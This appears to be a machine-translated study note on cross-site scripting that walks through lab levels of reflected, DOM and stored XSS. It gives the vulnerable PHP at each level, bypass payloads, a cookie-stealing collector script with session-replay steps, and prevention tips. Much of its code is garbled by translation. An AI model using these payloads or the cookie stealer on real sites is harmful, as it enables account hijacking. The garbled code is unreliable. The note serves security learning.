XSS Summary (always updated)

Reflective type:

In form, enter Jack
Web source code: <pre>hello jack</pre>

Test:

Low Level :<script>alert (' XSS ') </script>

Code: directly to the input judgment, no security filtering
<?php

Is there any input?
if (array_key_exists ("name", $_get) && $_get[' name ']! = NULL) {
Feedback for end user
Echo ' <pre>hello '. $_get[' name ']. ' </pre> ';
}

?>

Middle Level: <scr<script>ipt>alert (' XSS ') </script>

Code: Replace <script> with the Str_replace function, but not strictly, you can bypass
<?php

Is there any input?
if (array_key_exists ("name", $_get) && $_get[' name ']! = NULL) {
Get input
$name = Str_replace (' <script> ', ' ', $_get[' name ');

Feedback for end user
echo "<pre>hello ${name}</pre>";
}

?>

High -level: Use event:11</pre><pre>22 any script in the vicinity

Code: Regular expressions are replaced, wildcard characters are used, and script-related substitutions are made, but the event-type construction statements are not filtered
<?php

Is there any input?
if (array_key_exists ("name", $_get) && $_get[' name ']! = NULL) {
Get input
$name = Preg_replace ('/< (. *) s (. *) C (. *) R (. *) I (. *) P (. *) t/i ', ', $_get[' name ']);

Feedback for end user
echo "<pre>hello ${name}</pre>";
}

?>

highest level code: Strict, add token,htmlspecialchars () to the input parameters of the entity escape, input <,> and so will be as the entity character output
<?php

Is there any input?
if (array_key_exists ("name", $_get) && $_get[' name ']! = NULL) {
Check ANTI-CSRF Token
Checktoken ($_request[' User_token '), $_session[' Session_token '], ' index.php ');

Get input
$name = Htmlspecialchars ($_get[' name ');

Feedback for end user
echo "<pre>hello ${name}</pre>";
}

Generate ANTI-CSRF Token
Generatesessiontoken ();

?>

Dom Type:

The DOM can be understood as a standard programming interface for accessing HTML.
No need for background server involvement

Test:
' Onclick=alert (' XSS ')//closing single quotes, using the onclick event, and/or commenting out the enclosed single quotes
' >< ' Insert Picture, and an error event occurs, then close the rear

Web page source code:
<! DOCTYPE html>
<body>

<script>
function Xsstest () {
var Str=document.getelementbyid ("text"). Value;
document.getElementById ("T"). Innerhtml= "<a href= '" +str+ "' >testlink</a>";
}

</script>

<input type= "text" id= "text" value= ""/>
<input type= "button" value= "Write" onclick= "Xsstest ()" >
<div id= ' t ' ></div>
</body>

Storage type:

Input Box Length bypass:
<input name= "Txtname" size= "ten" maxlength= "type=" "Text" >
The length can be modified by Firebug

or use burp suit to capture the packet replay.

Web page source code:
<div id= "guestbook_comments" >name:tttt<br/>message:ttttt<br/></div>

Low level:
Test: <script>alert (' XSS ') </script>
Code:
<?php

if (Isset ($_post[' btnsign ')) {
Get input
$message = Trim ($_post[' mtxmessage ');//trim removes whitespace characters (default) or other predefined characters on either side of the string
$name = Trim ($_post[' txtname ');

Sanitize message Input
$message = Stripslashes ($message); Remove the backslash
$message = mysql_real_escape_string ($message); This function can be used to prevent database attacks, to filter special characters, to escape SQL statements, such as ', escaped to the entity, output to the front end without processing

Sanitize Name Input
$name = mysql_real_escape_string ($name);

Update Database
$query = "INSERT into guestbook (comment, name) VALUES (' $message ', ' $name ');";
$result = mysql_query ($query) or Die (' <pre> '. Mysql_error (). ' </pre> ');

Mysql_close ();
}

?>

Middle Level:
Test: <scr<script>ipt>alert (' XSS ') </script>
Code:
<?php

if (Isset ($_post[' btnsign ')) {
Get input
$message = Trim ($_post[' mtxmessage ');
$name = Trim ($_post[' txtname ');

Sanitize message Input
$message = Strip_tags (addslashes ($message));//strip_tags () strips HTML tags from strings; Addslashes () adds a backslash before each double quote
$message = mysql_real_escape_string ($message);
$message = Htmlspecialchars ($message); Htmlspecialchars () Convert pre-defined word such as <>& ' "to HTML entity

Sanitize Name Input
$name = Str_replace (' <script> ', ' ', $name);
$name = mysql_real_escape_string ($name);

Update Database
$query = "INSERT into guestbook (comment, name) VALUES (' $message ', ' $name ');";
$result = mysql_query ($query) or Die (' <pre> '. Mysql_error (). ' </pre> ');

Mysql_close ();
}

?>
High level:
Test:
Code:
<?php

if (Isset ($_post[' btnsign ')) {
Get input
$message = Trim ($_post[' mtxmessage ');
$name = Trim ($_post[' txtname ');

Sanitize message Input
$message = Strip_tags (addslashes ($message));
$message = mysql_real_escape_string ($message);
$message = Htmlspecialchars ($message);

Sanitize Name Input
$name = Preg_replace ('/< (. *) s (. *) C (. *) R (. *) I (. *) P (. *) t/i ', ", $name);
$name = mysql_real_escape_string ($name);

Update Database
$query = "INSERT into guestbook (comment, name) VALUES (' $message ', ' $name ');";
$result = mysql_query ($query) or Die (' <pre> '. Mysql_error (). ' </pre> ');

Mysql_close ();
}

?>

Higher- Level code: very Strict
<?php

if (Isset ($_post[' btnsign ')) {
Check ANTI-CSRF Token
Checktoken ($_request[' User_token '), $_session[' Session_token '], ' index.php ');

Get input
$message = Trim ($_post[' mtxmessage ');
$name = Trim ($_post[' txtname ');

Sanitize message Input
$message = Stripslashes ($message);
$message = mysql_real_escape_string ($message);
$message = Htmlspecialchars ($message);

Sanitize Name Input
$name = Stripslashes ($name);
$name = mysql_real_escape_string ($name);
$name = Htmlspecialchars ($name);

Update Database
$data = $db->prepare (' INSERT into guestbook (comment, name) VALUES (: Message,: Name);
$data->bindparam (': Message ', $message, PDO::P aram_str);
$data->bindparam (': Name ', $name, PDO::P aram_str);
$data->execute ();
}

Generate ANTI-CSRF Token
Generatesessiontoken ();

?>

Stealing cookies:

Attacker code:
<?php

$cookie =$_get[' Cookie '];
$time =date (' y-m-d g:i:s ');
$referer =getenv (' http_referer ');
$cookietxt =fopen (' cookie.txt ', ' a ');
Fwrite ($cookietxt, "Time:". $time. "Cookie:". $cookie. "Referer:". $referer. "); Note double quotes, error prone
Fclose ($cookietxt);

?>

Script side:
<script>
document.write (' ');
</script>

After obtaining a cookie, use Firebug to find a cookie, create a new cookie
Add a cookie, submit it with referer, and log in directly without entering your account password!

XSS prevention measures:
1. Filter and encode the front-end input:
For example, only allow the input of the specified type of characters, such as phone number format, registration user name restrictions, etc., the input check needs to be completed on the server side, the front end of the limit is easy to bypass;
Filtering and escaping of special characters;
2. Filter and encode the output: encode and escape the value of the variable when it is exported to the front-end HTML;
3. Use Http-only for key cookies

XSS Summary (always updated)